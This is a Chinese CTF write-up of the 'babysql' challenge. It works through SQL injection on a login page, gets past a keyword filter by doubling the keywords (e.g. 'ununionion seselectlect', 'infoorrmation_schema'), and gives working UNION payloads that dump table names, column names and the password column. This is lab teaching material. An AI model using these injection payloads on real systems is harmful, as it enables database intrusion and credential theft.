当前位置: 首页 > article >正文

babysql

article 2024/9/24 14:23:03

打开界面是一个登录框,所以直接使用的万能公式,但是没用出发了报错

结合提示来看,题目应该是过滤掉了or

尝试大小写绕过,失败了

尝试双写绕过,成功绕过限制

接下来就判断字段数,发现by也被过滤掉了

登是登上去了,但是没啥用测不出来,还是直接用联合查询看看

不出意外union select都被过滤掉了,还是尝试双写绕过

1' ununionion seselectlect 1,2#

虽然没能成功,但是根据报错提示得出字段数不对

1' ununionion seselectlect 1,2,3#

成功试出来,包含三个字段

information from还有 where给过滤了,再次尝试双写绕过

发现information只是过滤掉了or

绕过成功

-1' ununionion seselectlect 1,database(),group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()#

查看b4bsql表里的所有字段,并没有发现任何flag表,查看geekuser也是一样,那现在就一个个看吧,通常可能会在password里

-1' ununionion seselectlect 1,database(),group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'#

发现password被过滤,基本没跑了,尝试双写绕过

真的蠢,原来是因为password里包含or 所以被过滤掉了

获取到flag,完成

-1' ununionion seselectlect 1,database(),group_concat(passwoorrd) frfromom geek.b4bsql#


http://www.kler.cn/news/17015.html

相关文章:

  • JavaWeb学习------Servlet
  • Java基本数据类型以及包装类型的常量池技术
  • Java中线程池的介绍、构造方法及优势
  • 电子工程师是怎么练成的
  • 数据结构与算法之链表: Leetcode 141. 环形链表 (Typescript版)
  • 谷粒商城二十四Sentinel限流熔断降级
  • 用于scATAC-seq有监督分类的Cellcano
  • 【LeetCode刷题记录】数组专题
  • Python小姿势 - Python面向对象
  • 《基于深度学习模型的非接触式面部视频记录技术用于心房颤动的检测》阅读笔记
  • 「Codeforces」B. Avoid Local Maximums
  • Redis之五大基本的数据类型:字符串String 散列hashes 列表 lists 集合sets 有序集合sorted sets 基础命令讲解
  • 学生台灯什么牌子好对眼睛好?专业护眼灯的学生台灯分享
  • 【AI工具】bing chat 使用--三种模式+撰写功能
  • gradle Task 详解
  • 什么是Filter?
  • 工具及方法 - 安装播放器pot player
  • 大二一个学期学这么点内容,没有概念,只有实操
  • TCP的三次握手和四次挥手
  • 冲浪杂记——
  • Apollo 7.0——percception:rader源码剖析
  • win11本地安全机构保护已关闭怎么办?如何修复windows11本地安全机构保护已关闭?
  • ubuntu: ubuntu22.04安装redis数据库,并设置开机自启动
  • Redis底层设计与源码分析(一)__底层数据结构逻辑分析
  • 低代码,一招制敌,解决职场人的的办公难题
  • 【热门框架】Maven中聚合,继承指的是什么?有什么作用?
  • 刚转岗做项目经理,无从下手,怎么办?
  • 【硬件】嵌入式电子设计基础之分析电路
  • 视频转gif如何做?三步教你视频转gif制作
  • ClickHouse的资料